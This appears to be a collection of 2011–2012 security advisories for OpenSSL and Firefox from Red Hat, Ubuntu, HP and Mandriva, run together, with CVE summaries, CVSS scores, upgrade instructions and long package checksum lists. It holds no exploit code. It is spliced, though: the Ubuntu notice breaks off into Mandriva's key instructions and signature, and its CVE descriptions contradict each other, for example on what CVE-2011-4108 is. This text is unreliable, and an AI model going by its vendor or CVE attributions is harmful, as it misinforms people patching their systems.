ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-4108.html https://www.redhat.com/security/data/cve/CVE-2011-4576.html https://www.redhat.com/security/data/cve/CVE-2011-4577.html https://www.redhat.com/security/data/cve/CVE-2011-4619.html https://access.redhat.com/security/updates/classification/#moderate 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPHySOXlSAg2UNWIIRAlYpAKCQCY5k4gZ5VKOHZekEaWFHDNjGZwCZAdR3 CJl5iUxU4cxJLOsSBESSRVs= =PMiS -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Content-Disposition: inline ==========================================================================Ubuntu Security Notice USN-1357-1 February 09, 2012 openssl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS - Ubuntu 8.04 LTS Summary: Multiple vulnerabilities exist in OpenSSL that could expose sensitive information or cause applications to crash. Software Description: - openssl: Secure Socket Layer (SSL) binary and related cryptographic tools Details: It was discovered that the elliptic curve cryptography (ECC) subsystem in OpenSSL, when using the Elliptic Curve Digital Signature Algorithm (ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement curves over binary fields. This could allow an attacker to determine private keys via a timing attack. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945) Adam Langley discovered that the ephemeral Elliptic Curve Diffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread safety while processing handshake messages from clients. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. This could allow a remote attacker to recover plaintext. (CVE-2011-4108) Antonio Martin discovered that a flaw existed in the fix to address CVE-2011-4108, the DTLS MAC check failure. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-4109) It was discovered that OpenSSL, in certain circumstances involving ECDH or ECDHE cipher suites, used an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves. This issue only affected Ubuntu 8.04 LTS. (CVE-2011-4576) Andrew Chi discovered that OpenSSL, when RFC 3779 support is enabled, could trigger an assert when handling an X.509 certificate containing certificate-extension data associated with IP address blocks or Autonomous System (AS) identifiers. (CVE-2011-4619) Andrey Kulikov discovered that the GOST block cipher engine in OpenSSL did not properly handle invalid parameters. This could allow a remote attacker to cause a denial of service via crafted data from a TLS client. This issue only affected Ubuntu 11.10. (CVE-2012-0027) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: libssl1.0.0 1.0.0e-2ubuntu4.2 openssl 1.0.0e-2ubuntu4.2 Ubuntu 11.04: libssl0.9.8 0.9.8o-5ubuntu1.2 openssl 0.9.8o-5ubuntu1.2 Ubuntu 10.10: libssl0.9.8 0.9.8o-1ubuntu4.6 openssl 0.9.8o-1ubuntu4.6 Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.8 openssl 0.9.8k-7ubuntu8.8 Ubuntu 8.04 LTS: libssl0.9.8 0.9.8g-4ubuntu3.15 openssl 0.9.8g-4ubuntu3.15 After a standard system update you need to reboot your computer to make all the necessary changes. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPFFPomqjQ0CJFipgRAl3XAJ98ku9J45p5DbU9rrN6ysGe/RplGQCg1ueY rXmxnKKkthEOaOLbMi8jRlg= =HfOo -----END PGP SIGNATURE----- . Release Date: 2012-01-19 Last Updated: 2012-01-19 ------------------------------------------------------------------------------ Potential Security Impact: Remote Denial of Service (DoS), unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX OpenSSL. This vulnerability could be exploited remotely to create a Denial of Service (DoS) or to gain unauthorized access. SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08s. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-4109 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 9.3 CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided upgrades to resolve this vulnerability. The upgrades are available from the following location ftp://ossl098s:Secure12@ftp.usa.hp.com HP-UX Release / Depot Name B.11.11 PA (32 and 64) / OpenSSL_A.00.09.08s.001_HP-UX_B.11.11_32+64.depot B.11.23 (PA and IA) / OpenSSL_A.00.09.08s.002_HP-UX_B.11.23_IA-PA.depot B.11.31 (PA and IA) / OpenSSL_A.00.09.08s.003_HP-UX_B.11.31_IA-PA.depot MANUAL ACTIONS: Yes - Update Install OpenSSL A.00.09.08s or subsequent PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 ================== openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.001 or subsequent HP-UX B.11.23 ================== openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.002 or subsequent HP-UX B.11.31 ================== openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.003 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) 19 January 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
var-201105-0197 Unspecified vulnerability in the Java Embedding Plugin (JEP) in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, on Mac OS X allows remote attackers to bypass intended access restrictions via unknown vectors. Mozilla Firefox and SeaMonkey are prone to a privilege-escalation vulnerability. An attacker can exploit this issue by enticing an unsuspecting user into viewing malicious content. A successful exploit will result in the execution of arbitrary attacker-supplied code with elevated privileges. Failed exploit attempts will likely result in denial-of-service conditions. This issue is fixed in: Firefox 3.6.17 Firefox 3.5.19 SeaMonkey 2.0.14 NOTE: This issue was previously discussed in BID 47635 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2011-12 through -18 Multiple Vulnerabilities) but has been moved to its own record to better document it. Firefox is a very popular open source web browser. SeaMonkey is an open source web browser, mail and newsgroup client, IRC session client, and HTML editor. Remote attackers can use unknown vectors to bypass preset access restrictions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2011:079 http://www.mandriva.com/security/ _______________________________________________________________________ Package : firefox Date : April 30, 2011 Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: Chris Evans of the Chrome Security Team reported that the XSLT generate-id() function returned a string that revealed a specific valid address of an object on the memory heap. It is possible that in some cases this address would be valuable information that could be used by an attacker while exploiting a different memory corruption but, in order to make an exploit more reliable or work around mitigation features in the browser or operating system (CVE-2011-1202). Security researcher Soroush Dalili reported that the resource: protocol could be exploited to allow directory traversal on Windows and the potential loading of resources from non-permitted locations. The impact would depend on whether interesting files existed in predictable locations in a useful format. For example, the existence or non-existence of particular images might indicate whether certain software was installed (CVE-2011-0071). Security researcher Paul Stone reported that a Java applet could be used to mimic interaction with form autocomplete controls and steal entries from the form history (CVE-2011-0067). Security researcher regenrecht reported several dangling pointer vulnerabilities via TippingPoint&#039;s Zero Day Initiative (CVE-2011-0065, CVE-2011-0066, CVE-2011-0073). Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code (CVE-2011-0081, CVE-2011-0069, CVE-2011-0070, CVE-2011-0080, CVE-2011-0074, CVE-2011-0075, CVE-2011-0077, CVE-2011-0078, CVE-2011-0072). Additionally the sqlite3 packages were upgraded to the 3.7.6.2 version. A new package that provides /usr/bin/lemon was added. The lemon software was previousely provided with sqlite3 and is used in some cases when building php. Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490 Additionally, some packages which require so, have been rebuilt and are being provided as updates. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1202 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0071 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0067 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0065 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0066 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0073 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0081 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0069 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0070 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0074 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0075 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0078 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0072 http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#firefox3.6.17 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: 2973de477d7455b08bbe09f5a570f6aa 2009.0/i586/beagle-0.3.8-13.36mdv2009.0.i586.rpm 7e198710e98eed5835de55a07bcc645d 2009.0/i586/beagle-crawl-system-0.3.8-13.36mdv2009.0.i586.rpm a9955422fa8f5e70cee6df6a3b9fae7c 2009.0/i586/beagle-doc-0.3.8-13.36mdv2009.0.i586.rpm 23513c8d7d383f3b0d20902b30d11790 2009.0/i586/beagle-epiphany-0.3.8-13.36mdv2009.0.i586.rpm 391f72db4d9b334fed1b3d33306ee55f 2009.0/i586/beagle-evolution-0.3.8-13.36mdv2009.0.i586.rpm 7311810525b3483b8754ecc4390033e6 2009.0/i586/beagle-gui-0.3.8-13.36mdv2009.0.i586.rpm 935fdbace81371b2eea685f037caff00 2009.0/i586/beagle-gui-qt-0.3.8-13.36mdv2009.0.i586.rpm 8ca9aa9f40e44a872cf0befa74789302 2009.0/i586/beagle-libs-0.3.8-13.36mdv2009.0.i586.rpm cabf1109de711d8b8b144501263d6d9a 2009.0/i586/devhelp-0.21-3.25mdv2009.0.i586.rpm 5d49d110ca039207523256b93ca0aefb 2009.0/i586/devhelp-plugins-0.21-3.25mdv2009.0.i586.rpm 9da6dcff3078fda7f7b78843400051b7 2009.0/i586/epiphany-2.24.3-0.14mdv2009.0.i586.rpm 0ac6148e0be68f6c9ae8263c1399769e 2009.0/i586/epiphany-devel-2.24.3-0.14mdv2009.0.i586.rpm 0f1ff7a4bfc2067c89b66fd98e62e8f9 2009.0/i586/firefox-3.6.17-0.1mdv2009.0.i586.rpm 68c6d5e2860f7c24f4af09bc313f5164 2009.0/i586/firefox-af-3.6.17-0.1mdv2009.0.i586.rpm 2a63cbcbd840c1ba22ac317e44c36f80 2009.0/i586/firefox-ar-3.6.17-0.1mdv2009.0.i586.rpm 00bca75faebfbd49825d0b03580f5123 2009.0/i586/firefox-be-3.6.17-0.1mdv2009.0.i586.rpm db03eca0613b52f2f077279d6883a0d5 2009.0/i586/firefox-bg-3.6.17-0.1mdv2009.0.i586.rpm 4a552121865938a8912a68de5dab9be6 2009.0/i586/firefox-bn-3.6.17-0.1mdv2009.0.i586.rpm 8f7d1c3f2f79f1d25d14a3cd8d6401e3 2009.0/i586/firefox-ca-3.6.17-0.1mdv2009.0.i586.rpm 228db324dd6cdd307fcf4642c63b48bb 2009.0/i586/firefox-cs-3.6.17-0.1mdv2009.0.i586.rpm 948c6ebab830b48a173c471a1b8526a8 2009.0/i586/firefox-cy-3.6.17-0.1mdv2009.0.i586.rpm 7472f143a13da640d052c40977a027df 2009.0/i586/firefox-da-3.6.17-0.1mdv2009.0.i586.rpm a40f6c2977f79caa31e87d09169d1a0e 2009.0/i586/firefox-de-3.6.17-0.1mdv2009.0.i586.rpm 3861628556d0d7b4a3c8200cbd0dc8d3 2009.0/i586/firefox-devel-3.6.17-0.1mdv2009.0.i586.rpm 3571fa7c7e0cc159ec27d13bbcd18afb 2009.0/i586/firefox-el-3.6.17-0.1mdv2009.0.i586.rpm 71ed13d932446cd071f57370f1c67993 2009.0/i586/firefox-en_GB-3.6.17-0.1mdv2009.0.i586.rpm 7204644845d2f0516c8231604e51be06 2009.0/i586/firefox-eo-3.6.17-0.1mdv2009.0.i586.rpm a304223e23e5ae9d862606aa64eb0473 2009.0/i586/firefox-es_AR-3.6.17-0.1mdv2009.0.i586.rpm e10040850cae86538b035f5795147359 2009.0/i586/firefox-es_ES-3.6.17-0.1mdv2009.0.i586.rpm 0da9a35d0287fe8537e50aad67864861 2009.0/i586/firefox-et-3.6.17-0.1mdv2009.0.i586.rpm e433dcf9f297d3468d02e34c1cdec2f7 2009.0/i586/firefox-eu-3.6.17-0.1mdv2009.0.i586.rpm b8c6a66f15cda3f88e41d251e492b766 2009.0/i586/firefox-ext-beagle-0.3.8-13.36mdv2009.0.i586.rpm 298ffb6cb4907c8fed7013bc1cd8b7cd 2009.0/i586/firefox-ext-blogrovr-1.1.804-0.13mdv2009.0.i586.rpm 346f393bb67e5b07d7f5da620f0a7cfd 2009.0/i586/firefox-ext-mozvoikko-1.0-0.13mdv2009.0.i586.rpm c5549d686d3cf1af3f1af6e76d53710d 2009.0/i586/firefox-ext-scribefire-3.5.1-0.13mdv2009.0.i586.rpm b0bb514e6bc44941c257ab9e9a4886ce 2009.0/i586/firefox-ext-xmarks-3.5.10-0.13mdv2009.0.i586.rpm 45513fb325474a1ab238f0603e277f53 2009.0/i586/firefox-fi-3.6.17-0.1mdv2009.0.i586.rpm f779393326b33faac80b0464423de6b2 2009.0/i586/firefox-fr-3.6.17-0.1mdv2009.0.i586.rpm 53410f5a375a58acf74911b4455408a2 2009.0/i586/firefox-fy-3.6.17-0.1mdv2009.0.i586.rpm b3839dd9b19d38c42ea35a44d618a9c6 2009.0/i586/firefox-ga_IE-3.6.17-0.1mdv2009.0.i586.rpm e05ece41e912c28410ce8c4d5e7aac09 2009.0/i586/firefox-gl-3.6.17-0.1mdv2009.0.i586.rpm 586386851fbe0a16b578cd9cb6268440 2009.0/i586/firefox-gu_IN-3.6.17-0.1mdv2009.0.i586.rpm 854c678ffd13330aec33447c9b197769 2009.0/i586/firefox-he-3.6.17-0.1mdv2009.0.i586.rpm 017389c95a4b6c2d073d318180d5e384 2009.0/i586/firefox-hi-3.6.17-0.1mdv2009.0.i586.rpm 155b3dd9f3d4df8d171c66a304d2fd85 2009.0/i586/firefox-hu-3.6.17-0.1mdv2009.0.i586.rpm 7ba221d915d86a7ff40021d37cbfe985 2009.0/i586/firefox-id-3.6.17-0.1mdv2009.0.i586.rpm 39130b124a73caef8f2b4f9aa6b0e61a 2009.0/i586/firefox-is-3.6.17-0.1mdv2009.0.i586.rpm b71974aed5edda2cc0e65000df3a1011 2009.0/i586/firefox-it-3.6.17-0.1mdv2009.0.i586.rpm 07a88fe9d9beb8ba7b5ee9936f347dc5 2009.0/i586/firefox-ja-3.6.17-0.1mdv2009.0.i586.rpm fe09ec733d5edede980b81e3bb1a9809 2009.0/i586/firefox-ka-3.6.17-0.1mdv2009.0.i586.rpm 1f54c7528e5b7ce3b9b85cfa8e875640 2009.0/i586/firefox-kn-3.6.17-0.1mdv2009.0.i586.rpm a217105802753a4f9d7ed341a1192f63 2009.0/i586/firefox-ko-3.6.17-0.1mdv2009.0.i586.rpm c42801fa51cdf12a07d3afd8f65be5ff 2009.0/i586/firefox-ku-3.6.17-0.1mdv2009.0.i586.rpm fdb5ff5c53e6290f5e543cbbc80f0782 2009.0/i586/firefox-lt-3.6.17-0.1mdv2009.0.i586.rpm a42d147c886a87428e1433081f8fab98 2009.0/i586/firefox-lv-3.6.17-0.1mdv2009.0.i586.rpm 3c9a81ffc3597e21448f5f5a9485b399 2009.0/i586/firefox-mk-3.6.17-0.1mdv2009.0.i586.rpm 799700985d71360d86de7372d0cf0364 2009.0/i586/firefox-mr-3.6.17-0.1mdv2009.0.i586.rpm 8540e2fd37d7e577fa9c770af9360b60 2009.0/i586/firefox-nb_NO-3.6.17-0.1mdv2009.0.i586.rpm 26dbb0a70d552a636dfb22d7725859c2 2009.0/i586/firefox-nl-3.6.17-0.1mdv2009.0.i586.rpm c76027df052ae1cc125e798b07fb9a83 2009.0/i586/firefox-nn_NO-3.6.17-0.1mdv2009.0.i586.rpm 60a2f1bd57c903e7c66c5905e8e192a9 2009.0/i586/firefox-oc-3.6.17-0.1mdv2009.0.i586.rpm a0ce0cff62e5217e50ced505dc22261a 2009.0/i586/firefox-pa_IN-3.6.17-0.1mdv2009.0.i586.rpm 67346320e8159a7c1a351482ae832fdd 2009.0/i586/firefox-pl-3.6.17-0.1mdv2009.0.i586.rpm fc448d8eec4340436fa55350a91a4f24 2009.0/i586/firefox-pt_BR-3.6.17-0.1mdv2009.0.i586.rpm cf72d6ad8a417fd724e52210bf509b74 2009.0/i586/firefox-pt_PT-3.6.17-0.1mdv2009.0.i586.rpm 34ea987f1a28427acd00f07b97038890 2009.0/i586/firefox-ro-3.6.17-0.1mdv2009.0.i586.rpm 305033f355f87f0b4b567d6b7563354e 2009.0/i586/firefox-ru-3.6.17-0.1mdv2009.0.i586.rpm 3c40b9a2484cdabd87784fe09661ecb8 2009.0/i586/firefox-si-3.6.17-0.1mdv2009.0.i586.rpm 7aa26e6bb6d954a5ad008c1e3d909cbc 2009.0/i586/firefox-sk-3.6.17-0.1mdv2009.0.i586.rpm 3f23f9c83f414de0059cb60eebf8d850 2009.0/i586/firefox-sl-3.6.17-0.1mdv2009.0.i586.rpm f5e77819022ca51867af2a8d34f2a066 2009.0/i586/firefox-sq-3.6.17-0.1mdv2009.0.i586.rpm ab6de80851e9b39524a1a9e50508f4b6 2009.0/i586/firefox-sr-3.6.17-0.1mdv2009.0.i586.rpm e3e2d2e7c58ea80d9e518f50f75e11bb 2009.0/i586/firefox-sv_SE-3.6.17-0.1mdv2009.0.i586.rpm 7889dfad70b01797357808b0efd4181a 2009.0/i586/firefox-te-3.6.17-0.1mdv2009.0.i586.rpm 8eb35b7fb3d9717269d656ab0af66d85 2009.0/i586/firefox-th-3.6.17-0.1mdv2009.0.i586.rpm db344c8f85860dc0939ae13cfc0a73ef 2009.0/i586/firefox-theme-kfirefox-0.16-0.13mdv2009.0.i586.rpm b7cbe47a64595ec5c8e323727885eb8c 2009.0/i586/firefox-tr-3.6.17-0.1mdv2009.0.i586.rpm 63c912c7c72a2683fd2749f5a643709e 2009.0/i586/firefox-uk-3.6.17-0.1mdv2009.0.i586.rpm 445eec8f6167567b32046e16d1e4a8ac 2009.0/i586/firefox-zh_CN-3.6.17-0.1mdv2009.0.i586.rpm 36de2012d0dc81e1636912aebe714cd7 2009.0/i586/firefox-zh_TW-3.6.17-0.1mdv2009.0.i586.rpm fea435facb5a727a1769b95ffdd6b7d1 2009.0/i586/gnome-python-extras-2.19.1-20.27mdv2009.0.i586.rpm 44d5541c188e831160c627682823285d 2009.0/i586/gnome-python-gda-2.19.1-20.27mdv2009.0.i586.rpm 09de2acc67f26df4996b244fb720a865 2009.0/i586/gnome-python-gda-devel-2.19.1-20.27mdv2009.0.i586.rpm d78dbc547deafba5525ddef72093099b 2009.0/i586/gnome-python-gdl-2.19.1-20.27mdv2009.0.i586.rpm aaefe570ba5819e6afa4fd49425fdf57 2009.0/i586/gnome-python-gtkhtml2-2.19.1-20.27mdv2009.0.i586.rpm 5868123938a14c88ce61b2604c7ea252 2009.0/i586/gnome-python-gtkmozembed-2.19.1-20.27mdv2009.0.i586.rpm f7e7eb05f7b7fc09db698dc47c187bb5 2009.0/i586/gnome-python-gtkspell-2.19.1-20.27mdv2009.0.i586.rpm 79225cceef1a08a2d7297d088e7b97b4 2009.0/i586/lemon-3.7.4-0.1mdv2009.0.i586.rpm 2c2f28010934dde726a22971771369b9 2009.0/i586/libdevhelp-1_0-0.21-3.25mdv2009.0.i586.rpm 7b6cb5ee62261c8f871c1ad99ca5b635 2009.0/i586/libdevhelp-1-devel-0.21-3.25mdv2009.0.i586.rpm 497c932d9820cc1699102646d2ef218b 2009.0/i586/libsqlite3_0-3.7.6.2-0.1mdv2009.0.i586.rpm fba77facd31656c25a044fedb3ffe3b5 2009.0/i586/libsqlite3-devel-3.7.6.2-0.1mdv2009.0.i586.rpm 530c270b9dd5e1a8c9e678bafedc6d53 2009.0/i586/libsqlite3-static-devel-3.7.6.2-0.1mdv2009.0.i586.rpm 9dd3cb1007979e629daa0d27f78be530 2009.0/i586/libxulrunner1.9.2.17-1.9.2.17-0.1mdv2009.0.i586.rpm 46b0fbc1b5e027120083a1ffd58605a8 2009.0/i586/libxulrunner-devel-1.9.2.17-0.1mdv2009.0.i586.rpm ad5e3d1ffd7382f012a9d57c4fa702e8 2009.0/i586/mozilla-thunderbird-beagle-0.3.8-13.36mdv2009.0.i586.rpm adad587299352a74e675cface6154638 2009.0/i586/sqlite3-tools-3.7.6.2-0.1mdv2009.0.i586.rpm aeb059de62194445a32c7de36faa9e2e 2009.0/i586/xulrunner-1.9.2.17-0.1mdv2009.0.i586.rpm a5caae640a02076364fdd8c189794478 2009.0/i586/yelp-2.24.0-3.28mdv2009.0.i586.rpm 0972d520d57df45393b0aef2da4b12ee 2009.0/SRPMS/beagle-0.3.8-13.36mdv2009.0.src.rpm 3f8b8f723797f0fbbb5e0264bac2bfbf 2009.0/SRPMS/devhelp-0.21-3.25mdv2009.0.src.rpm ebbdbeb5e3ccb2fe3f424a327eb475ef 2009.0/SRPMS/epiphany-2.24.3-0.14mdv2009.0.src.rpm 3350215ced82f1bcf19a8e8188bf0a61 2009.0/SRPMS/firefox-3.6.17-0.1mdv2009.0.src.rpm f11029532df82e7923c4b096af98d3f0 2009.0/SRPMS/firefox-ext-blogrovr-1.1.804-0.13mdv2009.0.src.rpm 5aca99c0285a4412ecf02cf6bf946801 2009.0/SRPMS/firefox-ext-mozvoikko-1.0-0.13mdv2009.0.src.rpm dbb411ce9ba2dc5416b53aea4c6641ae 2009.0/SRPMS/firefox-ext-scribefire-3.5.1-0.13mdv2009.0.src.rpm 96e289aef5dd3795e776125a93b9a11e 2009.0/SRPMS/firefox-ext-xmarks-3.5.10-0.13mdv2009.0.src.rpm 8681188142a3360b17eae804219d934e 2009.0/SRPMS/firefox-l10n-3.6.17-0.1mdv2009.0.src.rpm 0b632cc0d32c20cb4c7458c7c20b0bcf 2009.0/SRPMS/firefox-theme-kfirefox-0.16-0.13mdv2009.0.src.rpm 82b1d9b926a7a183edd6ee0b39ee9fd8 2009.0/SRPMS/gnome-python-extras-2.19.1-20.27mdv2009.0.src.rpm 5bffe9ac14aabf83ea8b5c79f0e8e33f 2009.0/SRPMS/lemon-3.7.4-0.1mdv2009.0.src.rpm aa8e2dcac3269d9836f3dade77086e7f 2009.0/SRPMS/sqlite3-3.7.6.2-0.1mdv2009.0.src.rpm fba6a9ca071ee5648b373d678d67e352 2009.0/SRPMS/xulrunner-1.9.2.17-0.1mdv2009.0.src.rpm 4dc1a3719ef51d45d3af0be61950aef7 2009.0/SRPMS/yelp-2.24.0-3.28mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b032aed8693b94bf0b5f457b0e7c3eb7 2009.0/x86_64/beagle-0.3.8-13.36mdv2009.0.x86_64.rpm 2fac29c992cd8be8892a4fb91d380336 2009.0/x86_64/beagle-crawl-system-0.3.8-13.36mdv2009.0.x86_64.rpm 055ef55bb8a468a5ec17e87a93a58b0d 2009.0/x86_64/beagle-doc-0.3.8-13.36mdv2009.0.x86_64.rpm 3fcee0a627224a9387b748a4abc461d5 2009.0/x86_64/beagle-epiphany-0.3.8-13.36mdv2009.0.x86_64.rpm 51976fc9309a41ca1ea61541110240b2 2009.0/x86_64/beagle-evolution-0.3.8-13.36mdv2009.0.x86_64.rpm a61243e5f9c5e0758dbfc4bc07b4dc84 2009.0/x86_64/beagle-gui-0.3.8-13.36mdv2009.0.x86_64.rpm 0a61952ef1924995be127129a149fbdf 2009.0/x86_64/beagle-gui-qt-0.3.8-13.36mdv2009.0.x86_64.rpm 734beb1bd9073dd56e5c2088213b7967 2009.0/x86_64/beagle-libs-0.3.8-13.36mdv2009.0.x86_64.rpm 595c25f3843781372230c07b5b33a442 2009.0/x86_64/devhelp-0.21-3.25mdv2009.0.x86_64.rpm 475b50ca8b0fbfeb52b09be5b92ed7ae 2009.0/x86_64/devhelp-plugins-0.21-3.25mdv2009.0.x86_64.rpm 8ddc7628fe244b65a69d4f40cc2f6c53 2009.0/x86_64/epiphany-2.24.3-0.14mdv2009.0.x86_64.rpm e7ae117ed437ad50e8d723818bc05ff9 2009.0/x86_64/epiphany-devel-2.24.3-0.14mdv2009.0.x86_64.rpm 04e2c0401ba7286141e292d0f4be0c6a 2009.0/x86_64/firefox-3.6.17-0.1mdv2009.0.x86_64.rpm e77f3b52a818b35b3b06f6a441221022 2009.0/x86_64/firefox-af-3.6.17-0.1mdv2009.0.x86_64.rpm ca49e550e4970bd20ec5e13d455b7657 2009.0/x86_64/firefox-ar-3.6.17-0.1mdv2009.0.x86_64.rpm 